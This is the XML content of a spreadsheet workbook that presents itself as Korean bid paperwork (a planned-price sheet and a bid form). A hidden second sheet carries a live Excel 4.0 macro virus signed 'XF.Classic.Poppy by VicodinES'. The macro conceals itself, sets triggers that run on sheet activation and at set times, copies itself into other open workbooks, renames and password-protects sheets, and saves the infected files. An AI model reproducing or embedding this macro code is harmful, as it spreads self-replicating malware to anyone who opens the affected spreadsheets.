      <x:c r="A8" s="51" t="s">
        <x:v>29</x:v>
      </x:c>
      <x:c r="B8" s="52"/>
      <x:c r="C8" s="56"/>
      <x:c r="D8" s="57"/>
      <x:c r="E8" s="57"/>
      <x:c r="F8" s="57"/>
      <x:c r="G8" s="57"/>
      <x:c r="H8" s="57"/>
      <x:c r="I8" s="58"/>
    </x:row>
    <x:row r="9" spans="1:9" s="18" customFormat="1" ht="64.5" customHeight="1">
      <x:c r="A9" s="63" t="s">
        <x:v>18</x:v>
      </x:c>
      <x:c r="B9" s="64"/>
      <x:c r="C9" s="65"/>
      <x:c r="D9" s="66"/>
      <x:c r="E9" s="66"/>
      <x:c r="F9" s="66"/>
      <x:c r="G9" s="66"/>
      <x:c r="H9" s="66"/>
      <x:c r="I9" s="67"/>
    </x:row>
    <x:row r="10" spans="1:9" s="18" customFormat="1" ht="30" customHeight="1">
      <x:c r="A10" s="23"/>
      <x:c r="B10" s="20"/>
      <x:c r="C10" s="20"/>
      <x:c r="D10" s="20"/>
      <x:c r="E10" s="20"/>
      <x:c r="F10" s="20"/>
      <x:c r="G10" s="20"/>
      <x:c r="H10" s="20"/>
      <x:c r="I10" s="24"/>
    </x:row>
    <x:row r="11" spans="1:9" ht="30" customHeight="1">
      <x:c r="A11" s="53"/>
      <x:c r="B11" s="54"/>
      <x:c r="C11" s="54"/>
      <x:c r="D11" s="54"/>
      <x:c r="E11" s="54"/>
      <x:c r="F11" s="54"/>
      <x:c r="G11" s="54"/>
      <x:c r="H11" s="54"/>
      <x:c r="I11" s="55"/>
    </x:row>
    <x:row r="12" spans="1:9" ht="52.5" customHeight="1">
      <x:c r="A12" s="68" t="s">
        <x:v>0</x:v>
      </x:c>
      <x:c r="B12" s="69"/>
      <x:c r="C12" s="69"/>
      <x:c r="D12" s="69"/>
      <x:c r="E12" s="69"/>
      <x:c r="F12" s="69"/>
      <x:c r="G12" s="69"/>
      <x:c r="H12" s="69"/>
      <x:c r="I12" s="70"/>
    </x:row>
    <x:row r="13" spans="1:9" ht="19.5" customHeight="1">
      <x:c r="A13" s="25"/>
      <x:c r="B13" s="26"/>
      <x:c r="C13" s="26"/>
      <x:c r="D13" s="26"/>
      <x:c r="E13" s="26"/>
      <x:c r="F13" s="26"/>
      <x:c r="G13" s="26"/>
      <x:c r="H13" s="26"/>
      <x:c r="I13" s="27"/>
    </x:row>
    <x:row r="14" spans="1:9" ht="51" customHeight="1">
      <x:c r="A14" s="68" t="s">
        <x:v>50</x:v>
      </x:c>
      <x:c r="B14" s="73"/>
      <x:c r="C14" s="73"/>
      <x:c r="D14" s="73"/>
      <x:c r="E14" s="73"/>
      <x:c r="F14" s="73"/>
      <x:c r="G14" s="73"/>
      <x:c r="H14" s="73"/>
      <x:c r="I14" s="74"/>
    </x:row>
    <x:row r="15" spans="1:9" ht="30" customHeight="1">
      <x:c r="A15" s="53"/>
      <x:c r="B15" s="54"/>
      <x:c r="C15" s="54"/>
      <x:c r="D15" s="54"/>
      <x:c r="E15" s="54"/>
      <x:c r="F15" s="54"/>
      <x:c r="G15" s="54"/>
      <x:c r="H15" s="54"/>
      <x:c r="I15" s="55"/>
    </x:row>
    <x:row r="16" spans="1:9" ht="60" customHeight="1">
      <x:c r="A16" s="48" t="s">
        <x:v>17</x:v>
      </x:c>
      <x:c r="B16" s="49"/>
      <x:c r="C16" s="49"/>
      <x:c r="D16" s="49"/>
      <x:c r="E16" s="49"/>
      <x:c r="F16" s="49"/>
      <x:c r="G16" s="49"/>
      <x:c r="H16" s="49"/>
      <x:c r="I16" s="50"/>
    </x:row>
    <x:row r="17" spans="2:9" ht="24.949999999999999" customHeight="1">
      <x:c r="B17" s="19"/>
      <x:c r="C17" s="19"/>
      <x:c r="D17" s="19"/>
      <x:c r="E17" s="19"/>
      <x:c r="F17" s="19"/>
      <x:c r="G17" s="19"/>
      <x:c r="H17" s="19"/>
      <x:c r="I17" s="19"/>
    </x:row>
    <x:row r="18" spans="2:9" ht="24.949999999999999" customHeight="1">
      <x:c r="B18" s="19"/>
      <x:c r="C18" s="19"/>
      <x:c r="D18" s="19"/>
      <x:c r="E18" s="19"/>
      <x:c r="F18" s="19"/>
      <x:c r="G18" s="19"/>
      <x:c r="H18" s="19"/>
      <x:c r="I18" s="19"/>
    </x:row>
    <x:row r="19" spans="2:9" ht="12" customHeight="1">
      <x:c r="B19" s="19"/>
      <x:c r="C19" s="19"/>
      <x:c r="D19" s="19"/>
      <x:c r="E19" s="19"/>
      <x:c r="F19" s="19"/>
      <x:c r="G19" s="19"/>
      <x:c r="H19" s="19"/>
      <x:c r="I19" s="19"/>
    </x:row>
    <x:row r="20" spans="2:9" ht="12" customHeight="1">
      <x:c r="B20" s="19"/>
      <x:c r="C20" s="19"/>
      <x:c r="D20" s="19"/>
      <x:c r="E20" s="19"/>
      <x:c r="F20" s="19"/>
      <x:c r="G20" s="19"/>
      <x:c r="H20" s="19"/>
      <x:c r="I20" s="19"/>
    </x:row>
    <x:row r="21" spans="2:9" ht="12" customHeight="1">
      <x:c r="B21" s="19"/>
      <x:c r="C21" s="19"/>
      <x:c r="D21" s="19"/>
      <x:c r="E21" s="19"/>
      <x:c r="F21" s="19"/>
      <x:c r="G21" s="19"/>
      <x:c r="H21" s="19"/>
      <x:c r="I21" s="19"/>
    </x:row>
    <x:row r="22" spans="2:9" ht="12" customHeight="1">
      <x:c r="B22" s="19"/>
      <x:c r="C22" s="19"/>
      <x:c r="D22" s="19"/>
      <x:c r="E22" s="19"/>
      <x:c r="F22" s="19"/>
      <x:c r="G22" s="19"/>
      <x:c r="H22" s="19"/>
      <x:c r="I22" s="19"/>
    </x:row>
    <x:row r="23" spans="2:9" ht="12" customHeight="1">
      <x:c r="B23" s="19"/>
      <x:c r="C23" s="19"/>
      <x:c r="D23" s="19"/>
      <x:c r="E23" s="19"/>
      <x:c r="F23" s="19"/>
      <x:c r="G23" s="19"/>
      <x:c r="H23" s="19"/>
      <x:c r="I23" s="19"/>
    </x:row>
    <x:row r="24" spans="2:9" ht="12" customHeight="1">
      <x:c r="B24" s="19"/>
      <x:c r="C24" s="19"/>
      <x:c r="D24" s="19"/>
      <x:c r="E24" s="19"/>
      <x:c r="F24" s="19"/>
      <x:c r="G24" s="19"/>
      <x:c r="H24" s="19"/>
      <x:c r="I24" s="19"/>
    </x:row>
    <x:row r="25" spans="2:9" ht="12" customHeight="1">
      <x:c r="B25" s="19"/>
      <x:c r="C25" s="19"/>
      <x:c r="D25" s="19"/>
      <x:c r="E25" s="19"/>
      <x:c r="F25" s="19"/>
      <x:c r="G25" s="19"/>
      <x:c r="H25" s="19"/>
      <x:c r="I25" s="19"/>
    </x:row>
    <x:row r="26" spans="2:9" ht="12" customHeight="1">
      <x:c r="B26" s="19"/>
      <x:c r="C26" s="19"/>
      <x:c r="D26" s="19"/>
      <x:c r="E26" s="19"/>
      <x:c r="F26" s="19"/>
      <x:c r="G26" s="19"/>
      <x:c r="H26" s="19"/>
      <x:c r="I26" s="19"/>
    </x:row>
    <x:row r="27" spans="2:9" ht="12" customHeight="1">
      <x:c r="B27" s="19"/>
      <x:c r="C27" s="19"/>
      <x:c r="D27" s="19"/>
      <x:c r="E27" s="19"/>
      <x:c r="F27" s="19"/>
      <x:c r="G27" s="19"/>
      <x:c r="H27" s="19"/>
      <x:c r="I27" s="19"/>
    </x:row>
    <x:row r="28" spans="2:9" ht="12" customHeight="1">
      <x:c r="B28" s="19"/>
      <x:c r="C28" s="19"/>
      <x:c r="D28" s="19"/>
      <x:c r="E28" s="19"/>
      <x:c r="F28" s="19"/>
      <x:c r="G28" s="19"/>
      <x:c r="H28" s="19"/>
      <x:c r="I28" s="19"/>
    </x:row>
    <x:row r="29" spans="2:9" ht="12" customHeight="1">
      <x:c r="B29" s="19"/>
      <x:c r="C29" s="19"/>
      <x:c r="D29" s="19"/>
      <x:c r="E29" s="19"/>
      <x:c r="F29" s="19"/>
      <x:c r="G29" s="19"/>
      <x:c r="H29" s="19"/>
      <x:c r="I29" s="19"/>
    </x:row>
    <x:row r="30" spans="2:9" ht="12" customHeight="1">
      <x:c r="B30" s="19"/>
      <x:c r="C30" s="19"/>
      <x:c r="D30" s="19"/>
      <x:c r="E30" s="19"/>
      <x:c r="F30" s="19"/>
      <x:c r="G30" s="19"/>
      <x:c r="H30" s="19"/>
      <x:c r="I30" s="19"/>
    </x:row>
    <x:row r="31" spans="2:9" ht="12" customHeight="1">
      <x:c r="B31" s="19"/>
      <x:c r="C31" s="19"/>
      <x:c r="D31" s="19"/>
      <x:c r="E31" s="19"/>
      <x:c r="F31" s="19"/>
      <x:c r="G31" s="19"/>
      <x:c r="H31" s="19"/>
      <x:c r="I31" s="19"/>
    </x:row>
    <x:row r="32" spans="2:9" ht="12" customHeight="1">
      <x:c r="B32" s="19"/>
      <x:c r="C32" s="19"/>
      <x:c r="D32" s="19"/>
      <x:c r="E32" s="19"/>
      <x:c r="F32" s="19"/>
      <x:c r="G32" s="19"/>
      <x:c r="H32" s="19"/>
      <x:c r="I32" s="19"/>
    </x:row>
    <x:row r="33" spans="2:9" ht="12" customHeight="1">
      <x:c r="B33" s="19"/>
      <x:c r="C33" s="19"/>
      <x:c r="D33" s="19"/>
      <x:c r="E33" s="19"/>
      <x:c r="F33" s="19"/>
      <x:c r="G33" s="19"/>
      <x:c r="H33" s="19"/>
      <x:c r="I33" s="19"/>
    </x:row>
    <x:row r="34" spans="2:9" ht="12" customHeight="1">
      <x:c r="B34" s="19"/>
      <x:c r="C34" s="19"/>
      <x:c r="D34" s="19"/>
      <x:c r="E34" s="19"/>
      <x:c r="F34" s="19"/>
      <x:c r="G34" s="19"/>
      <x:c r="H34" s="19"/>
      <x:c r="I34" s="19"/>
    </x:row>
    <x:row r="35" spans="2:9" ht="12" customHeight="1">
      <x:c r="B35" s="19"/>
      <x:c r="C35" s="19"/>
      <x:c r="D35" s="19"/>
      <x:c r="E35" s="19"/>
      <x:c r="F35" s="19"/>
      <x:c r="G35" s="19"/>
      <x:c r="H35" s="19"/>
      <x:c r="I35" s="19"/>
    </x:row>
    <x:row r="36" spans="2:9" ht="12" customHeight="1">
      <x:c r="B36" s="19"/>
      <x:c r="C36" s="19"/>
      <x:c r="D36" s="19"/>
      <x:c r="E36" s="19"/>
      <x:c r="F36" s="19"/>
      <x:c r="G36" s="19"/>
      <x:c r="H36" s="19"/>
      <x:c r="I36" s="19"/>
    </x:row>
    <x:row r="37" spans="2:9" ht="12" customHeight="1">
      <x:c r="B37" s="19"/>
      <x:c r="C37" s="19"/>
      <x:c r="D37" s="19"/>
      <x:c r="E37" s="19"/>
      <x:c r="F37" s="19"/>
      <x:c r="G37" s="19"/>
      <x:c r="H37" s="19"/>
      <x:c r="I37" s="19"/>
    </x:row>
    <x:row r="38" spans="2:9" ht="12" customHeight="1">
      <x:c r="B38" s="19"/>
      <x:c r="C38" s="19"/>
      <x:c r="D38" s="19"/>
      <x:c r="E38" s="19"/>
      <x:c r="F38" s="19"/>
      <x:c r="G38" s="19"/>
      <x:c r="H38" s="19"/>
      <x:c r="I38" s="19"/>
    </x:row>
    <x:row r="39" spans="2:9" ht="12" customHeight="1">
      <x:c r="B39" s="19"/>
      <x:c r="C39" s="19"/>
      <x:c r="D39" s="19"/>
      <x:c r="E39" s="19"/>
      <x:c r="F39" s="19"/>
      <x:c r="G39" s="19"/>
      <x:c r="H39" s="19"/>
      <x:c r="I39" s="19"/>
    </x:row>
    <x:row r="40" spans="2:9" ht="12" customHeight="1">
      <x:c r="B40" s="19"/>
      <x:c r="C40" s="19"/>
      <x:c r="D40" s="19"/>
      <x:c r="E40" s="19"/>
      <x:c r="F40" s="19"/>
      <x:c r="G40" s="19"/>
      <x:c r="H40" s="19"/>
      <x:c r="I40" s="19"/>
    </x:row>
    <x:row r="41" spans="2:9" ht="12" customHeight="1">
      <x:c r="B41" s="19"/>
      <x:c r="C41" s="19"/>
      <x:c r="D41" s="19"/>
      <x:c r="E41" s="19"/>
      <x:c r="F41" s="19"/>
      <x:c r="G41" s="19"/>
      <x:c r="H41" s="19"/>
      <x:c r="I41" s="19"/>
    </x:row>
    <x:row r="42" spans="2:9" ht="12" customHeight="1">
      <x:c r="B42" s="19"/>
      <x:c r="C42" s="19"/>
      <x:c r="D42" s="19"/>
      <x:c r="E42" s="19"/>
      <x:c r="F42" s="19"/>
      <x:c r="G42" s="19"/>
      <x:c r="H42" s="19"/>
      <x:c r="I42" s="19"/>
    </x:row>
    <x:row r="43" spans="2:9" ht="12" customHeight="1">
      <x:c r="B43" s="19"/>
      <x:c r="C43" s="19"/>
      <x:c r="D43" s="19"/>
      <x:c r="E43" s="19"/>
      <x:c r="F43" s="19"/>
      <x:c r="G43" s="19"/>
      <x:c r="H43" s="19"/>
      <x:c r="I43" s="19"/>
    </x:row>
    <x:row r="44" spans="2:9" ht="12" customHeight="1">
      <x:c r="B44" s="19"/>
      <x:c r="C44" s="19"/>
      <x:c r="D44" s="19"/>
      <x:c r="E44" s="19"/>
      <x:c r="F44" s="19"/>
      <x:c r="G44" s="19"/>
      <x:c r="H44" s="19"/>
      <x:c r="I44" s="19"/>
    </x:row>
  </x:sheetData>
  <x:mergeCells count="21">
    <x:mergeCell ref="A16:I16"/>
    <x:mergeCell ref="A3:B3"/>
    <x:mergeCell ref="A4:B4"/>
    <x:mergeCell ref="A6:B6"/>
    <x:mergeCell ref="A8:B8"/>
    <x:mergeCell ref="A11:I11"/>
    <x:mergeCell ref="A15:I15"/>
    <x:mergeCell ref="C6:I6"/>
    <x:mergeCell ref="C8:I8"/>
    <x:mergeCell ref="B1:I1"/>
    <x:mergeCell ref="B2:I2"/>
    <x:mergeCell ref="C4:I4"/>
    <x:mergeCell ref="A9:B9"/>
    <x:mergeCell ref="C9:I9"/>
    <x:mergeCell ref="A12:I12"/>
    <x:mergeCell ref="C3:I3"/>
    <x:mergeCell ref="A5:B5"/>
    <x:mergeCell ref="C5:I5"/>
    <x:mergeCell ref="A14:I14"/>
    <x:mergeCell ref="A7:B7"/>
    <x:mergeCell ref="C7:I7"/>
  </x:mergeCells>
  <x:pageMargins left="0.74805557727813721" right="0.74805557727813721" top="0.98430556058883667" bottom="0.98430556058883667" header="0.5" footer="0.5"/>
  <x:pageSetup paperSize="9" scale="77" firstPageNumber="1" fitToWidth="1" fitToHeight="1" orientation="portrait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C41"/>
  <x:sheetViews>
    <x:sheetView topLeftCell="A1" zoomScale="75" zoomScaleNormal="75" zoomScaleSheetLayoutView="75" workbookViewId="0">
      <x:selection activeCell="C1" activeCellId="0" sqref="C1:C1"/>
    </x:sheetView>
  </x:sheetViews>
  <x:sheetFormatPr defaultColWidth="8.77734375" defaultRowHeight="12.5"/>
  <x:cols>
    <x:col min="1" max="1" width="34.83203125" style="2" customWidth="1"/>
    <x:col min="2" max="2" width="1.5" style="2" customWidth="1"/>
    <x:col min="3" max="3" width="37.5" style="2" customWidth="1"/>
    <x:col min="4" max="16384" width="10.6640625" style="2" customWidth="1"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A1" s="1" t="s">
        <x:v>26</x:v>
      </x:c>
      <x:c r="C1" s="2" t="e">
        <x:f>WORKBOOK.HIDE("XL4Poppy")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="2" spans="1:1" ht="13.5" customHeight="1">
      <x:c r="A2" s="1" t="s">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="3" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A3" s="3" t="s">
        <x:v>58</x:v>
      </x:c>
      <x:c r="C3" s="4" t="s">
        <x:v>59</x:v>
      </x:c>
    </x:row>
    <x:row r="4" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A4" s="3" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C4" s="5" t="e">
        <x:f>RUN(C18)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="5" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C5" s="5" t="e"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63</x:v>
      </x:c>
      <x:c r="C7" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="8" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A8" s="7" t="s">
        <x:v>48</x:v>
      </x:c>
      <x:c r="C8" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="9" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A9" s="8" t="s">
        <x:v>53</x:v>
      </x:c>
      <x:c r="C9" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="10" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A10" s="7" t="s">
        <x:v>52</x:v>
      </x:c>
      <x:c r="C10" s="5" t="e">
        <x:f>RUN(A21)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="11" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A11" s="9" t="s">
        <x:v>56</x:v>
      </x:c>
      <x:c r="C11" s="5" t="e">
        <x:f>ON.TIME("6:30:00 PM","Hello")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="12" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C12" s="5" t="e">
        <x:f>ON.TIME("6:30:00 AM","Morning")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="13" spans="3:3" ht="13.5" customHeight="1">
      <x:c r="C13" s="5" t="e">
        <x:f>ON.SHEET(,"Poppy",TRUE)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="14" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A14" s="4" t="s">
        <x:v>61</x:v>
      </x:c>
      <x:c r="C14" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="15" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A15" s="5" t="e">
        <x:f>ALERT("XF.Classic.Poppy by VicodinES",2)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="16" spans="1:1" ht="13.5" customHeight="1">
      <x:c r="A16" s="5" t="e">
        <x:f>ALERT("ⓒ 1998 The Narkotic Network",2)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="17" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A17" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C17" s="4" t="s">
        <x:v>55</x:v>
      </x:c>
    </x:row>
    <x:row r="18" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C18" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="19" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C19" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="20" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A20" s="11" t="s">
        <x:v>57</x:v>
      </x:c>
      <x:c r="C20" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="21" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A21" s="12" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C21" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="22" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A22" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C22" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="23" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A23" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C23" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="24" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A24" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="25" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A25" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="26" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A26" s="5" t="e">
        <x:f>NEW(1)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C26" s="13" t="s">
        <x:v>62</x:v>
      </x:c>
    </x:row>
    <x:row r="27" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A27" s="5" t="e">
        <x:f>WORKBOOK.INSERT(1)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C27" s="5" t="e">
        <x:f>RUN(C19)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="28" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A28" s="5" t="e">
        <x:f>WORKBOOK.INSERT(1)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C28" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="29" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A29" s="5" t="e">
        <x:f>ACTIVATE.PREV()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C29" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="30" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A30" s="5" t="e">
        <x:f>RUN(C18)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C30" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="31" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A31" s="5" t="e">
        <x:f>WORKBOOK.COPY("XL4Poppy",A1)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C31" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="32" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A32" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet3","Sheet99")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C32" s="5" t="e">
        <x:f>ACTIVATE.PREV()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="33" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A33" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet1","Sheet3")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C33" s="5" t="e">
        <x:f>RUN(C19)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="34" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A34" s="5" t="e">
        <x:f>WORKBOOK.NAME("Sheet99","Sheet1")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C34" s="5" t="e">
        <x:f>WORKBOOK.COPY("XL4Poppy",A1)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="35" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A35" s="5" t="e">
        <x:f>PROTECT.DOCUMENT(TRUE,,"VicodinES",TRUE)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C35" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="36" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A36" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C36" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="37" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A37" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="38" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A38" s="5" t="e">
        <x:f>WORKBOOK.PREV()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="39" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A39" s="5" t="e">
        <x:f>SAVE.AS(A3)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C39" s="12" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="40" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A40" s="5" t="e">
        <x:f>FILE.CLOSE()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C40" s="5" t="e">
        <x:f>MESSAGE(TRUE,"VicodinES and Lord Natas greet you a good morning!")</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="41" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A41" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C41" s="10" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
  </x:sheetData>
  <x:sheetProtection password="8863" sheet="1" objects="1" scenarios="1" formatCells="1" formatColumns="1" formatRows="1" insertColumns="1" insertRows="1" insertHyperlinks="1" deleteColumns="1" deleteRows="1" selectLockedCells="0" sort="1" autoFilter="1" pivotTables="1" selectUnlockedCells="0"/>
  <x:pageMargins left="0.74805557727813721" right="0.74805557727813721" top="0.98430556058883667" bottom="0.98430556058883667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예정가격</vt:lpstr>
      <vt:lpstr>입찰서</vt:lpstr>
      <vt:lpstr>VXXXXXXX</vt:lpstr>
    </vt:vector>
  </ep:TitlesOfParts>
  <ep:TotalTime>1269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관리과02</dc:creator>
  <cp:lastModifiedBy>v377120071</cp:lastModifiedBy>
  <cp:revision>160</cp:revision>
  <cp:lastPrinted>2023-02-10T07:45:19.139</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2001-04-03T05:55:52.000</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-20T07:13:51.998</dcterms:modified>
  <cp:version>1100.0100.01</cp:version>
</cp:coreProperties>
</file>